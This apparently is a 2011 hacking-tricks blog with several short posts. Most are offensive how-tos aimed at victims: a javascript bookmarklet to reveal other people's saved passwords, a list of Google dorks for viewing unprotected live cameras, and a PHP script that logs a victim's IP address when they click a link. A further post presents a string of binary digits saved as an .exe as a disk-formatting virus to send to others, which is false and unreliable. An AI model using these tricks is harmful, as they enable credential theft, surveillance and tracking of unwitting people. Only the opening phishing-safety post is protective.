Tuesday, 29 November 2011

What is phishing and how to be safe from phishing ?


    What is Phishing ?

                    Phishing is one of the type of hacking . It is a method of acquiring sensitive information such as username, password, bank information etc. Phishing page could be saif as an duplicate page of real one. Its look exactly similar as the real page.But when user enter sensitive information on such phishing page his information is send to the E-mail address provided in the phishing page or you can say the one who created that phishing page. Phishing page is mostly send via mail. Target of phishing are mostly social networking sites like facebook, orkut etc. Also Banks website to acquire credit card details,website like yahoo, gmail are also target of phishing.



    Example of Phishing scams:
  • Email asking you to login to your locked account to unlock it.
  • Email carrying a Link to sites like Facebook,yahoo etc and asking you to Login.
  • Emails containing some Information of your Interest and asking you to Login to Your Account.
   
     How to be safe from phishing ?
  • Never login to any of your account through link provided in the Email.
  • Go to real website dont click on any link posted anywhere. such as link posted on your facebook wall by friend or link provided in comments or link to ceratin website on any blog.
  • Check the URL of website before entering any sensitive information. Because the URL of phishing page is not same as the URL of  real one.
  • Real gmail page looks like gmail.com while phishing looks different somthing like gmail.anything.com

Wednesday, 23 November 2011

Get password behind asterisks


           This is trick will let you see password behind asterisks. You might be thinking what is asterisks. It is dots or stars you see when you type password. This trick will let you see password behind asterisks. often people save their password on browser so this trick will let you get their password easily.

  • Go to the page that contain password in asterisks.
  • Now copy the following code.
javascript:(function(){var s,F,j,f,i; s = ""; F = document.forms; for(j=0; j<F.length; ++j) { f = F[j]; for (i=0; i<f.length; ++i) { if (f[i].type.toLowerCase() == "password") s += f[i].value + "\n"; } } if (s) alert("Passwords in forms on this page:\n\n" + s); else alert("There are no passwords in forms on this page.");})();
  • Paste the code into address bar of the page.
  • Now you will get the password on that page.
      NOTE: This trick works on internet explorer and might works on old version of other 
                    web browser.

    Monday, 14 November 2011

    How to block unblock websites ?

    • Go to Start and then Run.
    • Type in this C:\WINDOWS\system32\drivers\etc
    • Now you will see file name Host open that in Notepad.
    • Below "127.0.0.1 localhost" add IP address of site to be blocked.
    • To unblock any site just reversed the process.
       
          EXAMPLE
         127.0.0.1 localhost
         69.171.224.14    (This will block Facebook)
         NOTE: For each site you block just add "1" to the IP (127.0.0.1)

    Saturday, 12 November 2011

    View or Hack Unprotected Live Cameras Using Google

    hack unprotected cam
    In this tutorial i will teach you to hack or view unprotected cam using a simple google trick. Using this trick you can see live view of streets in china or america. Inner view of some office and lot more. Lets dive into it.

    How To View Unprotected Cam ?       

         1. Go to Google and search for "inurl:view/view.shtml" (without quote).
             2. Now open any of the link from the search result and enjoy.
               3. Below is the list of google dork you can use to see more cams.

        List Of Google Dork

        • inurl:/view.shtml
        • intitle:”Live View / - AXIS” | inurl:view/view.shtml^
        • inurl:ViewerFrame?Mode=
        • inurl:ViewerFrame?Mode=Refresh
        • inurl:axis-cgi/jpg
        • inurl:axis-cgi/mjpg (motion-JPEG)
        • inurl:view/indexFrame.shtml
        • inurl:view/index.shtml
        • inurl:view/view.shtml
        • intitle:start inurl:cgistart
        • intitle:”live view” intitle:axis
        • liveapplet
        • intitle:snc-z20 inurl:home/
        • intitle:liveapplet
        • intitle:”i-Catcher Console - Web Monitor”
        • intitle:axis intitle:”video server”
        • intitle:liveapplet inurl:LvAppl
        • intitle:”EvoCam” inurl:”webcam.html”
        • intitle:”Live NetSnap Cam-Server feed”
        • intitle:”Live View / - AXIS”
        • intitle:”Live View / - AXIS 206W”
        • intitle:”Live View / - AXIS 210″
        • inurl:indexFrame.shtml Axis
        • intitle:”Live View / - AXIS 206M”
        • inurl:”MultiCameraFrame?Mode=Motion”
        • allintitle:”Network Camera NetworkCamera”
        • intitle:”WJ-NT104 Main Page”
        • intext:”MOBOTIX M1″ intext:”Open Menu”
        • intext:”MOBOTIX M10″ intext:”Open Menu”
        • intext:”MOBOTIX D10″ intext:”Open Menu”
        • intitle:”netcam live image”
        • intitle:snc-cs3 inurl:home/
        • intitle:snc-rz30 inurl:home/
        • intitle:”sony network camera snc-p1″
        • intitle:”sony network camera snc-m1″
        • site:.viewnetcam.com -www.viewnetcam.com
        • intitle:”Toshiba Network Camera” user login

        More Cool Hacking Tricks 

        Monday, 7 November 2011

        Hackers Underground Hand Book Completely Free

        hackers underground handbook
                    Hackers underground Handbook is really nice for begineers. It contain some begineers as well as advance hacking tutorials. You can ask for any Ebooks by commenting below i will provide you. If you like my post then subscribe below for such more great ebooks and tutorials Also like my Facebook Page. The content of book is listed below:

        • Concept of Hacking
        • Programming
        • Linux
        • Network Hacking 
        • Wireless Hacking
        • Windows Hacking
        • Web Hacking
        • Malware

        Saturday, 5 November 2011

        Create Binary Virus to Format Hard Disk

        Create Binary Virus to Format Hard Disk
        Today i will show you to make a virus to format Hard disk using binary code. You can send this file to your friend or enemy to format their Hard disk. But please don't try this on your own computer or else you will end up formatting your own computer.

        How To Create Virus To Format Hard Drive ?

           1. Copy the below codes into Notepad.
        01001011000111110010010101010101010000011111100000
           2. Save the file as Format.exe
           3. You just created virus to format Hard Drive. Enjoy !!!

        If for some reason this does not work for you then check out below tutorial


        Friday, 4 November 2011

        How To Grab Someone IP Address ?

        In this tutorial i will you show you how to grab someone Ip address using PHP script.This method can be used to grab someone Ip address on yahoo or Facebook chat or by sending mail to victim. So Lets get started.

        How To Hack Someone Ip Address ?

            1. Copy the below codes into Notepad and save it as Grab.php (.php is must) 

          <?php
          $hostname = gethostbyaddr($_SERVER['REMOTE_ADDR']);
          $img_number = imagecreate(400,95);
          $backcolor = imagecolorallocate($img_number,10,102,153);
          $textcolor = imagecolorallocate($img_number,255,255,255);

          imagefill($img_number,0,0,$backcolor);
          $number0 = " This is Your IP/Proxy";
          $number1 = " IP: $_SERVER[HTTP_X_FORWARDED_FOR]";
          $number2 = " Host/Proxy: $hostname";
          $number4 = " _________________________________";

          Imagestring($img_number,10,5,5,$number0,$textcolor);
          Imagestring($img_number,10,5,25,$number1,$textcolor);
          Imagestring($img_number,10,5,45,$number2,$textcolor);
          Imagestring($img_number,10,5,50,$number4,$textcolor);
          Imagestring($img_number,10,8,50,$number4,$textcolor);
          Imagestring($img_number,10,5,10,$number4,$textcolor);
          Imagestring($img_number,10,8,10,$number4,$textcolor);

          header("Content-type: image/png");
          imagepng($img_number);
          $file=fopen("Name-here-to-protect-the-File.txt","a");
          $file2 = "- IP joined - IP/Proxy: $_SERVER[HTTP_X_FORWARDED_FOR] - Host: $hostname - '\n' ";
          fwrite($file, $file2);
          fclose($file);
          ?>

                2. Now make Free account on any of  the free web hosting sites Ripway or on  My3gb .
                3. Now Upload Grab.php to your web hosting site.
                4. Copy the link of your  uploaded file and send it to victim.
                5. As soon as victim will click on your link his ip will be saved in your free web hosting site.
                6. Enjoy you are Done !!

              Other Interesting Hacks Related To Ip Address